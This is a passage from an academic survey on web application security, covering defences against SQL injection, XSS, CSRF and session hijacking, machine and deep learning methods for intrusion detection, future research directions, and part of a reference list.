Many methods are available to identify SQL Injection because SQL Injection is one of the most commonly used attacks [60]. In [110], a Web Application Firewall (WAF) based on an Artificial Neural Network (ANN) was proposed by the researchers as a method to avoid the majority of SQL attacks. It divides into two steps: training and working. The system is fed a collection of regular and malicious data for the ANN training in the training stage. Integrate ANN into the WAFs to identify the attacks at the working stage. The authors described a semantic comparison-based scheme in [95]. During the training and run time, after the conceptual comparison has been carried out between two syntax trees, the query is considered malicious if two trees are not equal. Still, the query is considered genuine if these trees are alike or similar. In [46], the researcher introduced another tool, WASP, which is used to avoid SQL attacks. It is based on two different concepts positive contaminating and syntax aware evaluation. Positive contaminating is used to find and manage trusted data rather than untrusted data as in negative contaminating. It is producing false positives rather than false negatives.

8.2.2. Protection against broken authentication and session management

Binding the client’s IP address is a standard method of preventing session hijacking. In more detail, the web server collects user session data to create an IP address for a specific user and then ignores all other requests from other IP addresses. But it only works if each user has a unique and Static IP Address. Moreover, most networks follow the NAT protocol for IP address distribution, which allocates the same IP address to multiple clients on a network, making the technique less productive [17]. Tracking the person’s search engine bio-metrics is another way of preventing session hijacking. The user’s browser fingerprint is made up of several characteristics. Any change in the user’s browser fingerprint could indicate that an attacker has stolen a session [115]. The cloud services are targeted by Macaroons, which restricts access to the cookie. Macaroons use a shared secret and a message chain to create a chain of nested Hash-based message authentication codes [31].

8.2.3. Protection against XSS attacks

User-input validation on the server-side is the first step against XSS. Validation can be carried out using either blacklisting or whitelisting techniques. It is possible to reject malicious user input if detected [17]. However, it is difficult to provide complete security to complex websites using input handling methods. In [171], the researcher also suggested a WA proxy method for identifying and restricting XSS attacks. The recommended framework provides a reverse proxy that detects returned HTML texts before locating vulnerable scripts using a modified web browser.

8.2.4. Protection against insecure direct object references

The access control mechanism is mainly used to provide proper security to resources and use of internal WA operations. In Role-Based Access Control (RBAC) [37], for example, programmers use permissions to control objects which are assigned to roles. The approval gives a user access to a specific role during a session. Because of some duty rules, users cannot take more than one role simultaneously. For example, RBAC is used by Cisco ACE WAF to define the administration roles of the WAF itself. In [121] researcher identifies a secure cookie-based implementation of an access control system with different roles. The role data of the user is stored in a pair of secure cookies and sent to the suitable servers. They used verification procedures known as Pretty Good Privacy (PGP) to validate these cookies. In [11], the authors proposed an access control method for open web services and applications. The Extensible Access Control Markup Language (XACML), a type of access control language, is the foundation of their work.

8.2.5. Protection against sensitive data exposure

Data Breach: This flaw occurs only when the developer leaves some weak points during coding; it can only improve by paying close attention to what he left in code and handling errors safely.

Database Theft: Cryptography, in combination with a good database access security policy, is a critical solution for overcoming this attack. In [33], the researchers suggested database-driven security protocols to protect against this attack.

8.2.6. Protection against CSRF

Some server-side security measures are available to mitigate CSRF attacks [2,33]. In [66], the researcher defined no forge as a backend proxy that can be integrated into a system to detect and prevent CSRF attacks while remaining invisible to applications running. The primary function of a proxy is to detect and protect PHP applications from CSRF attacks. The characteristics of server-side safety measures have been discussed for user protection, and a server-side plug-in was created to protect users from the attacks [181].

8.2.7. Protection against invalidated redirects and forwards

The authors classified phishing defenses into the following types: blacklist-based, visual similarity-based, machine learning-based, and heuristic-based [139]. The blacklist-based technique is used for creating a repository to discover phishing URLs regularly. The Google safe browsing API is the most remarkable work in this category, PhishNet [127]. It identifies malicious URLs based on previously identified malicious URLs and Automated Individual White List (AIWL) [21], which maintains a record of secure Login User Interface (LUI). Unfortunately, this record has a problem with unreliable LUI predictions. In general, blacklists-based have high True-Positive (TP) rates but low False-Positive (FP) rates [18,130].

8.3. Machine learning and deep learning for web security

8.3.1. Machine learning algorithms

Machine learning (ML) offers an alternate method for discovering vulnerabilities, and it is possibly quicker for finding vulnerability [29,39]. The ML algorithms could learn abstract and latent risky coding structures, possibly improving overall generalization. ML algorithms currently in use are mainly operable with source code, which is more human-readable. Imports (e.g., header files), software complexity metrics, function calls [114], and coding changes; researchers have used all of these as indicators for discovering possibly code snippets or vulnerable files [147,148]. Additionally, Version control systems include functionalities and information gathered, such as development activities [104] and code pushed [125], which were used to predict vulnerabilities. To address the limitations of the available methods, because many malware variants usually share the same behavior patterns [113], anti-malware organizations decided to create more advanced methods based on data mining and ML techniques [151]. These techniques utilize various forms of feature extraction (i.e., data representation) to create intelligent malware tracking systems. They often use an SVM-based classifier [133], a Naive Bayes classifier [68], or a combination of classifiers (nave Bayes, decision trees, and SVM) [74]. Recently, there is a lot of different ML techniques are used to identify malicious URLs. In [92], researchers identify malicious URL attributes using Statistical methodology, derive a few more features for ML, and compare different models with this classified model. Based on heuristic and feature-based methods, they proposed an approved semi-supervised method for training the URL, known as the multi-classification model [176]. This method achieves more accurate classification results. The classification of the state-of-the-art ML algorithms is shown in Fig. 10.

Fig. 10.

Classification of machine learning algorithms.

The entropy clustering and other technologies were utilized to predict and effectively detect DDoS attacks and make the system from the original passive defense to an active defense [117]. Jason used a variety of network detection technologies and proposed a single-factor evaluation framework [145]. Xiaoling et al. proposed a hierarchical multi-domain network security situational awareness method based on a graph database, which established a hierarchical model and divided the network into different domains, which can more effectively collect and process awareness data [158]. With the advance of cloud computing, authors integrated game theory into network security situational awareness and measured the network situation value by the utility of game theory [182]. Xiaowu et al. proposed a network security model based on NSSA to break through the communication barriers between different networks [88]. Z Ying et al. integrated the advantages of rough set theory and ML in data processing and feature selection into situation assessment, proposed a new network assessment model, and verified the feasibility and effectiveness of the model through experiments [188]. Experts proposed a network security prediction model based on adaptive evolutionary strategy optimization of a covariance matrix, optimized the super parameters of SVM through CMA-ES, and then preprocessed the accumulated data to strengthen the prediction ability of the model [64]. Jinsoo et al. used a Bayesian network to measure network security situational awareness and established the corresponding network security model [146]. Rajesh et al. proposed a security situational awareness system based on attack measurement using the attack measurement method [120]. A situation element extraction model is designed based on projection pursuit and uses Particle Swarm Optimization (PSO) to minimize the projection index. The experimental results show that the model has advantages in accuracy and convergence speed [168]. A situation element extraction mechanism has been developed based on Logistic Regression (LR) and an improved particle swarm optimization model. The experimental results show that the element extraction model constructed by this mechanism has a more vital generalization ability [79].

Many research efforts have been put into improving the automated vulnerability detecting process. However, human intelligence still plays a vital role in providing information and developing different methods used to detect vulnerability [164]. Many tools have been developed based on the experience of experts to predict how security experts focus on vulnerability detection, whether it is static or automated detection tools. For example, the static code analysis tool was based on extracted rule templates and developed with best software design practices. If any predefined rules are broken, the system will alert you. In addition, the designed selected features attained from code analysis, such as Abstract Syntax Tree (AST) and Control Flow Graph (CFG). ML-based detection methods depend significantly on wisely engineered feature sets that can be extracted from the code analysis (i.e., CFGs).

8.3.2. Deep learning algorithms

Deep learning (DL) algorithms are based on Deep Neural Networks (DNN), and these are large neural networks organized in many layers, which are proficient in automated feature representation. ML algorithms are in demand to identify different features based on human experience and deep domain knowledge. The process of classification algorithm might be time-consuming and error-prone [81,170]. DL techniques are proliferating in the fields of ML for finding vulnerabilities. On the one hand, the neural network/deep learning-based model layered structure facilitates memorizing conceptual and highly nonlinear structures, capturing the intrinsic structure of complex data. The usage of neural networks, on the other hand, allows for the automatic extracting of the features from different layers, as well as maybe with a higher level of generalization [84], removing expertise from the time-consuming and potentially error-prone process of feature engineering. Furthermore, DL algorithms can detect unique information that a human expert would never notice [140]. As a result, the function search area has grown, and researchers are motivated to use neural networks to understand vulnerable code patterns suggestive of application weaknesses. The DNNs are used to identify vulnerabilities; these models can advantage and acknowledge code concepts. DL algorithms can go one step toward limiting the gap than traditional ML-based approaches based solely on feature extraction. It is done by learning deep structures and high-level representations of web application codes that expose code concepts [7]. Supervised learning performs classification and regression for several web security tasks [105,108], and unsupervised copes with associative rule mining and clustering problems [51,53,56,58,59,61–63]. At the same time, reinforcement learning copes with exploration and exploitation problems [27]. Several unsupervised algorithms have revealed astonishing performance, such as Generative Adversarial Networks (GAN) [40], Auto Encoders (AE) [50,100], Recurrent Neural Networks (RNN) [14], Boltzmann Machine (BM) [135], Deep Belief Networks (DBN) [15] and various variants of these state-of-the-arts. The hybrid DL algorithms have also shown their importance in web security [57,70,89,101,108,160]. The classification of state-of-the-art DL algorithms is shown in Fig. 11. The CNN algorithms for text has also been adopted in the field of network security. As a special language parsed by the server, URL is similar to the traditional text language in composition, structure and characteristics. It is data with semantic relations. It is suitable to treat URL as a natural language in the feature representation. Therefore, the TextCNN model has the application in the web threat classification and detection scenario [178].

Fig. 11.

Classification of deep learning algorithms.

RNN model is designed for processing sequential input, unlike feed-forward networks like FCN or CNN (e.g., text). It is called a cyclic neural network because the current output of a sequence is related to the previous output. Specifically, the input of RNN is divided into time sequence relationships. The key feature of the RNN is memory, which can remember input values in earlier times. In web security detection, the data characteristics of URL can be transformed into vector sequences with time sequences after normalization. Using the memory feature of the RNN algorithm to extract features can achieve better detection results. As a result, many studies have used RNN versions to obtain a conceptual understanding of security breaches. The two-way form of RNNs is proficient in capturing a sequence’s dependencies. However, in complex cases, it is difficult to get relevant results only by analyzing the prior time series data, and it requires longer memory to trace the source. Therefore, Long Short-Term Memory (LSTM) can analyze time-series data in a longer time range. As a result, many researchers have used two ways LSTM (i.e., Bi-LSTM) [52] and Gated Recurrent Unit (GRU) [25] structures to gain knowledge of contextual code dependencies, which are essential to understanding the concepts of several different types of threats (e.g., buffer overrun vulnerabilities), which have code circumstances with multiple code lines that are either consecutive or intermittent, forming a vulnerable context. DL has been used to detect attacks in recent years, outperforming typical detection methods. In [14], the researcher investigated many URL identification models and realized that Neural networks do not require manual features, and their detection results are much better than other approaches [184,186], URL embedding [138].

A security feature extraction model based on an improved discrete wolf pack algorithm (IDWPA) utilized large-scale data and changeable intrusion behaviors in the cloud computing environment, which minimizes the redundancy of extracted features and the complexity of problems [131]. The experimental simulation shows that this algorithm’s data feature extraction and classification accuracy have significantly improved. Tian et al. used a Deep Belief Network (DBN) to extract network intrusion features, effectively improving the ability to resist Internet attacks [159]. Preethi et al. proposed a DL model based on Sparse Autoencoder (SAE) [129]. The new feature representation can be reconstructed effectively to reduce the error rate of intrusion prediction and improve the prediction rate. In [175], the authors proposed a situation assessment method based on adversarial DL and directly established the autoencoder deep neural network model (AEDNN) based on DAE and DNN.

For the advancement of network security intrusion detection, the authors used the DL method to detect intrusion data more comprehensively and introduced the latest work of network anomaly detection using DL [12,124]. Ones proposed an intrusion detection model based on DecisionTree (DT) algorithm with DBN fusion limit gradient lifting, which provides a new method for intrusion detection to process unbalanced data and improve the detection performance against rare attacks [136]. Furthermore, a Wi-Fi network intrusion detection model based on DBN was proposed, which improves the accuracy of intrusion detection and has better performance [165]. Liang et al. proposed a combined intrusion detection method based on a convolutional neural network and limit learning machine, which can effectively improve the accuracy of intrusion detection and has good generalization ability and real-time performance [82]. Similarly, an intrusion detection method based on Deep Convolution Neural Network (DCNN) was proposed and proved through experiments that this method reduces training time and false positive rate and improves detection accuracy and real-time processing performance of intrusion detection system [149]. Zhang et al. proposed an improved LeNet-5 and LSTM neural network structure for network intrusion detection [185]. The anomaly detection method based on improved CNN and LSTM neural networks was developed, effectively improving the detection rate and false alarm rate of network traffic detection [187].

8.4. Future prospects

The fundamental problems in applying the DL techniques to network security include algorithm performance problems, such as interpretability, traceability, adaptability, and self-learning. It is also needed to improve the false positive rate and unbalanced datasets [4,172]. The latest research results of DL technology with network anomaly detection as the core should be more investigated, including Deep Believe Network (DBN), Deep Neural Network (DNN), Recursive Neural Network (RNN), and ML techniques related to network anomaly detection. The application of DL algorithm in different network layers should be introduced, and discussed to enhance other network functions, such as network security, data sensing and compression, etc. [77,97]. In combination with the present stage and the problems and deficiencies, it is necessary to carry out in-depth research on the following aspects in the future:

The definition, extraction, analysis, and automation of network security are the premise for the further development of network security. Many methods are involved in feature engineering, so it can be considered to adopt feature extraction or feature selection combination methods for different data to improve the efficiency and effect of a large number of secure data processing.

It is valuable and has a broad future to continue to study the application of DL in the field of network security. Most network security industries’ security defense mechanisms sincerely rely on the traditional rule matching mode to generate alarms. However, the attackers have made rapid progress regarding tools and code level. The attack techniques have been evolving with the continuous advancement of the network and technology. If the intrusion detection method is permanently adopted, it not only depends on the experience of security experts but also has a severe time lag. Perhaps, most of the alarms found today seem outdated, which will cause losses to enterprises, and even more stringent security incidents will affect the national economy and the people’s livelihood. Therefore, only the updated detection model can truly confront the increasingly complex network environment and better protect the security of IT infrastructure and the rights and interests of Internet users.

Amalgamation and standardization of network security measurement indicators need to be more advanced. Currently, the network security measurement indicators have not reached a consensus, mainly because the network security measurement indicators in different application scenarios are different. Moreover, among the indicators of network security, the indicators of network security protection ability are complex and challenging to describe, which sets obstacles for the research of network security assessment and prediction. Establishing a unified and standardized network security system is more conducive to objectively, comprehensively, and accurately depicting the network security and facilitating the reference and integration of network security evaluation and prediction models.

The situation assessment network security can be oriented to large-scale network security data, focusing on the efficiency of element extraction, and parallelization can be added to improve the evaluation efficiency. The user behavior detection and evaluation method can be verified based on the public dataset and establish the evaluation index to verify the algorithm based on the user behavior data in the real-time network environment.

The network structure is complex, and the perceived network security data is ever-changing, so the network security prediction efficiency and accuracy in the dynamic environment should be improved. In addition, in different application scenarios, the network security prediction will have some unknown new features, and its network security may deviate from the expected trend. The corresponding network security prediction model should also be dynamically adjusted or combined with more intelligent DL methods, which can become the focus of further research.

The network security awareness model needs higher automation and intelligence. It also needs to study the network security risk assessment further to improve the active defense of the model. The network security model must be further verified in different simulations and real-time environments. Therefore, the further expansion of the model will have unique application value and practical significance.

9. Discussion and limitations

Nowadays, web applications are dominant because of their regular use in many sectors. Attacks on web applications are also on the rise due to rising demand. In this paper, we highlight the necessary critical features for web security. Discuss the top 10 vulnerabilities of web applications that may lead to massive damage. According to most research/studies, SQL and XSS attacks are the most common use attack, and both attacks are used widely on different platforms. SQL is a remote execution technique that allows attackers to obtain critical data from a web server database. On the other hand, XSS attacks are also considered a major security threat to a web application. Typically, XSS is caused by improper validations and user inputs. Such attacks allow running malicious scripts on the browser to steal cookies, hijack the session, etc. Pikachu platform is also an open-source and accessible to build web vulnerability platform. Compared with DVWA, the Pikachu platform takes the latest owasptop10 as the core and constantly updates the vulnerability module. The Pikachu platform now includes common SQL injection, code injection, XML external entity injection, sensitive information disclosure XSS cross-site script attack, file inclusion, file upload, PHP deserialization, and other web vulnerability scenarios. At the same time, each type of vulnerability in the Pikachu platform is designed into different subclasses according to different situations. The SQL injection is divided into digital injection, character injection, search injection, HTTP header injection. Additionally, the significant types of SQL injection vulnerabilities are based on Boolean, time, and wide byte injection. In addition, the code structure of the Pikachu platform is clear, and the content is easy to read. After the virtual machine is built, students can, according to the different needs of the experiment, modify the Pikachu platform’s source code. For example, add some filter functions appropriately, increase the difficulty of the experiment, etc.

Furthermore, we discuss how to protect the user from these top vulnerabilities and evaluate different techniques for protection. SQL injection is the primary attack. Several solutions were proposed to mitigate this attack, such as based on grammar, machine learning, entropy, and tainting. The grammar-based technique is very effective, but it is time-consuming and error-prone because they need to create a model for each request in this technique which is a time-consuming process. These approaches are unsuitable for detecting store procedure attacks and the subqueries in DBMS. Sometimes, the web page’s computational complexity and loading time influence the website’s security, becoming vulnerable to attackers. These issues were considered many times, and evolving strategies improve e-business [38,49,153].

Table 1
Pros and cons of different network security models

Models Pros Cons

Similarity based models [112] ∙ Easy to understand∙ Ideal effect with promising alarm information ∙ A large number of parameters, subjective∙ Poor effect on dissimilarity alarm information

Situation awareness based models [173] ∙ Detailed description exhibits better effects∙ Evaluation is more flexible∙ It needs to be updated in time to get better results ∙ Vulnerable to attacks by attackers∙ Requires modeling language

Cause and effect model [28] ∙ No need to define the attack behavior sequence∙ Need to define the cause and effect of a single attack∙ Good ability to predict ∙ Require connections between attacks∙ The enormous computing power required

Data Mining based models [41] ∙ It can correlate unknown attacks without prior knowledge ∙ Computationally expensive and takes a long time∙ Need to explore in combination with prior knowledge

Intrusion Detection models [83] ∙ Spots internal and external attacks∙ It offers a centralized system for the correlation of attacks∙ Provides the ability to enumerate attacks∙ It offers an additional protection layer and profound defense ∙ Produces false positives and false negatives∙ Need rigorous monitoring∙ Computationally expensive∙ Need skills

Zero Trust models [156] ∙ Less vulnerability∙ Strong policies for user identification and access∙ Smart data segmentation∙ Improved data protection∙ Decent security orchestration ∙ Difficult to fully transition to zero trust∙ Developers require other methods of authentication after the transition

Models	Pros	Cons
Similarity based models [112]	∙ Easy to understand∙ Ideal effect with promising alarm information	∙ A large number of parameters, subjective∙ Poor effect on dissimilarity alarm information
Situation awareness based models [173]	∙ Detailed description exhibits better effects∙ Evaluation is more flexible∙ It needs to be updated in time to get better results	∙ Vulnerable to attacks by attackers∙ Requires modeling language
Cause and effect model [28]	∙ No need to define the attack behavior sequence∙ Need to define the cause and effect of a single attack∙ Good ability to predict	∙ Require connections between attacks∙ The enormous computing power required
Data Mining based models [41]	∙ It can correlate unknown attacks without prior knowledge	∙ Computationally expensive and takes a long time∙ Need to explore in combination with prior knowledge
Intrusion Detection models [83]	∙ Spots internal and external attacks∙ It offers a centralized system for the correlation of attacks∙ Provides the ability to enumerate attacks∙ It offers an additional protection layer and profound defense	∙ Produces false positives and false negatives∙ Need rigorous monitoring∙ Computationally expensive∙ Need skills
Zero Trust models [156]	∙ Less vulnerability∙ Strong policies for user identification and access∙ Smart data segmentation∙ Improved data protection∙ Decent security orchestration	∙ Difficult to fully transition to zero trust∙ Developers require other methods of authentication after the transition

Network technology is gradually progressing, with the coming of more and more types of network attacks, the scale of network attacks is becoming larger and larger, and the way of attacks has also changed. In contrast, the current network attacks are gradually improving based on advanced approaches. Each network attack provides information for the next attack. For example, suppose one wants to attack the system host. In that case, he will first scan the port to obtain the host or port that may have vulnerabilities and then attack the host through vulnerabilities until achieve the purpose of attacking the host. The correlation analysis models are divided into several types and have different forms of expression and effects. Furthermore, several well-known network security mechanisms have been developed in the last decades, such as Zero Trust, Network Segmentation, Hyperscale, Intrusion Prevention System, Email Security, and Remote Access etc. The significant pros and cons of some of these methods are given in Table 1.

Additionally, it is nonviable to detect the attack less or in real-time because of its high time complexity. Some common examples of web security limitations are shown in Fig. 12. Entropy approaches are currently unstable because they are based on probabilistic models. Taint-based approaches take time because they must track every attribute on the website. ML techniques are also unsuitable for this situation because they require a lengthy practice period and can produce many positives and negatives. The second serious flaw concerns authentication and session management. A user’s level of access control changes to combat potential session vulnerabilities, and the value of the validated cookie can be updated. Website developers can keep improving the authentication system by using time-signature or photo-based verification methods. The common protection against session attacks restricts JavaScript’s access to session cookies. Identifying a list of security initiatives is another good proposal. Numerous defensive system solutions are used to counter the XSS attack, and existing manufacturing strategies depend primarily on user input sanitization. The probability distribution of tokens is utilized in some methods to process web pages. Some methods rely on modifying the page code, either by creating a shadow site, trying to insert a script ID, or injecting boundaries [18,130]. The misuse of objects and web functions on the web can be protected by controlling and managing the roles. Also, it needs permission to handle them. The web developer must provide perfect website configuration during the implementation and testing. As a result, the attacker’s knowledge of the component’s default values is reduced while its security is enhanced. A manual scan of the server will be more beneficial in this stage.

Fig. 12.

Examples of web security limitations.

Regarding the sixth flaw, when personal information is exchanged between user and client, the web server must use a secure connection. Administrations must choose robust data to server policies and strong encryptions for the user’s personal information, which is stored in the database. The “Captcha” is one of the best ways to avoid CSRF attacks, i.e., the eighth flaw. To prevent bypassing it, we need to use strong models. Many other works have been proposed to deal with this type of threat. Users improve the client-side with some procedures and add a few scripts to the web server. In the ninth vulnerability, the developer should take extra precautions when working with external components on a website because it can cause weakness to the website, particularly in open-source frameworks and libraries. Developers can reduce risk by rebuilding their interface of these components. The last category in the list of top vulnerabilities is caused by phishing, which can be countered by creating fake URLs.

10. Conclusions

Web security and vulnerabilities are vital factors, specifically the environment where everything is dealt online. This paper has pointed out the challenges of web security problems. At first, we have discussed and given the essential features of web securities such as their types, attack impacts, comparison of different tools, security threats, and their importance for E-commerce security. Then, we have described several ways to secure the web, avoid vulnerabilities, and confer a wide range of privacy and security concerns related to web applications and E-commerce. Privacy and security are vital issues that need to be addressed to design a trustworthy and reliable environment. Lastly, we have described the role of ML and DL in web security. This paper will assist future web security endeavors and emerging secure e-business.

At present, the boom of machine learning has swept the world, and more and more relevant algorithms and models have been applied to different fields, including the field of web security. In terms of intrusion detection, several classifiers do not show ideal effect for intrusion detection, and exhibit some problems, such as weak generalization ability and low classification accuracy. These problems are accompanied by some factors which can be considered in future work, such as the setting of model parameters, a single sample of training data set, excessive noise interference in training data, and so on.

Footnotes

Acknowledgements

This paper and the research behind it would not have been possible without the exceptional support of all coauthors.

Conflict of interest

The authors have no conflicts of interest to declare.

Ethical approval and consent to participate

All participants provided ethical approval and informed consent to participate in the study.

References

M.S.H.

Abusaimeh and

Shkoukani, Survey of web application and Internet security threats, Int. J. Comput. Sci. Netw. Secur. 12(12) (2012), 67–76.

Agrawal,

P.J.

Haas and

Kiernan, Watermarking relational data: Framework, algorithms and analysis, VLDB J. 12(2) (2003), 157–169. doi:10.1007/s00778-003-0097-x.

Aken,

Litecky,

Ahmad and

Nelson, Mining for computing jobs, IEEE Softw. 27(1) (2009), 78–85. doi:10.1109/MS.2009.150.

M.A.

Al-Garadi,

Mohamed,

A.K.

Al-Ali,

Du,

Ali and

Guizani, A survey of machine and deep learning methods for Internet of things (IoT) security, IEEE Commun. Surv. Tutorials 22(3) (2020), 1646–1685. doi:10.1109/COMST.2020.2988293.

Alali,

Almogren,

M.M.

Hassan,

I.A.L.

Rassan and

M.Z.A.

Bhuiyan, Improving risk assessment model of cyber security using fuzzy logic inference system, Comput. Secur. 74 (2018), 323–339. doi:10.1016/j.cose.2017.09.011.

Ali,

S.K.

Shahzad and

Javed, SQLIPA: An authentication mechanism against SQL injection, Eur. J. Sci. Res. 38(4) (2009), 604–611.

Allamanis,

E.T.

Barr,

Devanbu and

Sutton, A survey of machine learning for big code and naturalness, ACM Comput. Surv. 51(4) (2018), 1–37. doi:10.1145/3212695.

A.A.

Almutairi,

Mishra and

AlShehri, Web security: Emerging threats and defense.

Alshamrani,

Myneni,

Chowdhary and

Huang, A survey on advanced persistent threats: Techniques, solutions, challenges, and research opportunities, IEEE Commun. Surv. Tutorials 21(2) (2019), 1851–1877. doi:10.1109/COMST.2019.2891891.

10.

Appiah,

I.K.

Nti and

Nyarko-Boateng, Investigating websites and web application vulnerabilities: Webmaster’s perspective, Int. J. Appl. Inf. Syst. 12(3) (2017), 868–2249.

11.

C.A.

Ardagna,

S.D.C.

di Vimercati,

Paraboschi,

Pedrini,

Samarati and

Verdicchio, Expressive and deployable access control in open web service applications, IEEE Trans. Serv. Comput. 4(2) (2010), 96–109. doi:10.1109/TSC.2010.29.

12.

F.E.

Ayo,

S.O.

Folorunso,

A.A.

Abayomi-Alli,

A.O.

Adekunle and

J.B.

Awotunde, Network intrusion detection based on deep learning model optimized with rule-based hybrid feature selection, Inf. Secur. J. A Glob. Perspect. 29(6) (2020), 267–283. doi:10.1080/19393555.2020.1767240.

13.

Badotra and

Sundas, A systematic review on security of E-commerce systems, Int. J. Appl. Sci. Eng. 18(2) (2021), 1–19. doi:10.6703/IJASE.202109_18(5).010.

14.

A.C.

Bahnsen,

E.C.

Bohorquez,

Villegas,

Vargas and

F.A.

González, Classifying phishing URLs using recurrent neural networks, in: 2017 APWG Symposium on Electronic Crime Research (eCrime), 2017, pp. 1–8.

15.

Balakrishnan,

Rajendran,

Pelusi and

Ponnusamy, Deep belief network enhanced intrusion detection system to prevent security breach in the Internet of things, Internet of things 14 (2021), 100112. doi:10.1016/j.iot.2019.100112.

16.

Balasubramanian and

Ruba, Security: A major threat for web services, in: 2012 IEEE International Conference on Advanced Communication Control and Computing Technologies (ICACCCT), 2012, pp. 104–109. doi:10.1109/ICACCCT.2012.6320751.

17.

Ben Fredj,

Cheikhrouhou,

Krichen,

Hamam and

Derhab, An OWASP top ten driven survey on web application protection methods, in: International Conference on Risks and Security of Internet and Systems, 2020, pp. 235–252.

18.

Bisht and

V.N.

Venkatakrishnan, XSS-GUARD: Precise dynamic prevention of cross-site scripting attacks, in: International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, 2008, pp. 23–43.

19.

S.W.

Boyd,

G.S.

Kc,

M.E.

Locasto,

A.D.

Keromytis and

Prevelakis, On the general applicability of instruction-set randomization, IEEE Trans. Dependable Secur. Comput. 7(3) (2008), 255–270. doi:10.1109/TDSC.2008.58.

20.

Bozic and

Wotawa, Planning-based security testing of web applications, in: 2018 IEEE/ACM 13th International Workshop on Automation of Software Test (AST), 2018, pp. 20–26.

21.

Cao,

Han and

Le, Anti-phishing based on automated individual white-list, in: Proceedings of the 4th ACM Workshop on Digital Identity Management, 2008, pp. 51–60. doi:10.1145/1456424.1456434.

22.

Chandratre and

Kulkarni, Security issues related to web services in e-commerce, in: 2014 International Conference on Advances in Communication and Computing Technologies (ICACACT 2014), 2014, pp. 1–5.

23.

G.R.

Chaudhari and

M.V.

Vaidya, A survey on security and vulnerabilities of web application, Int. J. Comput. Sci. Inf. Technol. 5(2) (2014), 1856–1860.

24.

Chih-Lin,

Sun,

Liu,

Zhang and

Han, The big-data-driven intelligent wireless network: Architecture, use cases, solutions, and future trends, IEEE Veh. Technol. Mag. 12(4) (2017), 20–29. doi:10.1109/MVT.2017.2752758.

25.

Cho

et al., Learning phrase representations using RNN encoder-decoder for statistical machine translation, 2014. arXiv:1406.1078.

26.

A.S.

Choudhary and

M.L.

Dhore, CIDT: Detection of malicious code injection attacks on web application, Int. J. Comput. Appl. 52(2) (2012).

27.

Coggan, Exploration and exploitation in reinforcement learning, Res. supervised by Prof. Doina Precup, CRA-W DMP Proj. McGill Univ., 2004.

28.

Cohen

et al., A cause and effect model of attacks on information systems: Some analysis based on that model, and the application of that model for cyberwarfare in CID, Comput. Secur. 17(3) (1998), 211–221. doi:10.1016/S0167-4048(98)80312-X.

29.

Coulter,

Q.-L.

Han,

Pan,

Zhang and

Xiang, Data-driven cyber security in perspective – Intelligent traffic analysis, IEEE Trans. Cybern. 50(7) (2019), 3081–3093. doi:10.1109/TCYB.2019.2940940.

30.

Cova,

Felmetsger and

Vigna, Vulnerability analysis of web-based applications, in: Test and Analysis of Web Services, Springer, 2007, pp. 363–394. doi:10.1007/978-3-540-72912-9_13.

31.

Dacosta,

Chakradeo,

Ahamad and

Traynor, One-time cookies: Preventing session hijacking attacks with stateless authentication tokens, ACM Trans. Internet Technol. 12(1) (2012), 1–24. doi:10.1145/2220352.2220353.

32.

Deng and

Xu, A risk assessment method for enterprise cloud accounting, in: 2019 12th International Symposium on Computational Intelligence and Design (ISCID), Vol. 2, 2019, pp. 172–175. doi:10.1109/ISCID.2019.10122.

33.

Doshi and

Trivedi, Sensitive data exposure prevention using dynamic database security policy, Int. J. Comput. Appl. 106(15) (2014), 18600–19869.

34.

R.-R.

Duh,

Sunder and

Jamal, Control and assurance in e-commerce: Privacy, integrity, and security at eBay, 2002.

35.

Y.F.G.M.

Elhakeem and

B.I.A.

Barry, Developing a security model to protect websites from cross-site scripting attacks using ZEND framework application, in: 2013 International Conference on Computing, Electrical and Electronic Engineering (Icceee), 2013, pp. 624–629.

36.

Eshete,

Villafiorita and

Weldemariam, Early detection of security misconfiguration vulnerabilities in web applications, in: 2011 Sixth International Conference on Availability, Reliability and Security, 2011, pp. 169–174. doi:10.1109/ARES.2011.31.

37.

Ferraiolo,

Cugini and

D.R.

Kuhn, Role-based access control (RBAC): Features and motivations, in: Proceedings of 11th Annual Computer Security Application Conference, 1995, pp. 241–248.

38.

Gehrke and

Turban, Determinants of successful website design: Relative importance and recommendations for effectiveness, in: Proceedings of the 32nd Annual Hawaii International Conference on Systems Sciences. 1999. HICSS-32. Abstracts and CD-ROM of Full Papers, 1999, p. 8.

39.

S.M.

Ghaffarian and

H.R.

Shahriari, Software vulnerability analysis and discovery using machine-learning and data-mining techniques: A survey, ACM Comput. Surv. 50(4) (2017), 1–36. doi:10.1145/3092566.

40.

Goodfellow

et al., Generative adversarial nets, Adv. Neural Inf. Process. Syst. 27 (2014).

41.

Gudadhe,

Prasad and

L.K.

Wankhade, A new data mining based network intrusion detection model, in: 2010 International Conference on Computer and Communication Technology (ICCCT), 2010, pp. 731–735. doi:10.1109/ICCCT.2010.5640375.

42.

B.B.

Gupta,

G.M.

Perez,

D.P.

Agrawal and

Gupta, Handbook of Computer Networks and Cyber Security, Vol. 10, Springer, 2020, pp. 973–978.

43.

Gupta and

B.B.

Gupta, CSSXC: Context-sensitive sanitization framework for web applications against XSS vulnerabilities in cloud environments, Procedia Comput. Sci. 85 (2016), 198–205. doi:10.1016/j.procs.2016.05.211.

44.

Gupta and

B.B.

Gupta, Detection, avoidance, and attack pattern mechanisms in modern web application vulnerabilities: Present and future challenges, Int. J. Cloud Appl. Comput. 7(3) (2017), 1–43.

45.

Gupta and

B.B.

Gupta, Cross-site scripting (XSS) attacks and defense mechanisms: Classification and state-of-the-art, Int. J. Syst. Assur. Eng. Manag. 8(1) (2017), 512–530. doi:10.1007/s13198-015-0376-0.

46.

Halfond,

Orso and

Manolios, Wasp: Protecting web applications using positive tainting and syntax-aware evaluation, IEEE Trans. Softw. Eng. 34(1) (2008), 65–81. doi:10.1109/TSE.2007.70748.

47.

Han,

Li,

Huang and

Feng, A software defined network-based security assessment framework for cloudIoT, IEEE Internet Things J. 5(3) (2018), 1424–1434. doi:10.1109/JIOT.2018.2801944.

48.

M.A.

Helmiawan,

Firmansyah,

Fadil,

Sofivan,

Mahardika and

Guntara, Analysis of web security using Open Web Application Security Project 10, in: 2020 8th International Conference on Cyber and IT Service Management (CITSM), 2020, pp. 1–5.

49.

Hernández,

Jiménez and

M.J.

Martín, Key website factors in e-business strategy, Int. J. Inf. Manage. 29(5) (2009), 362–371. doi:10.1016/j.ijinfomgt.2008.12.006.

50.

G.E.

Hinton,

Krizhevsky and

S.D.

Wang, Transforming auto-encoders, in: International Conference on Artificial Neural Networks, 2011, pp. 44–51.

51.

G.E.

Hinton and

R.R.

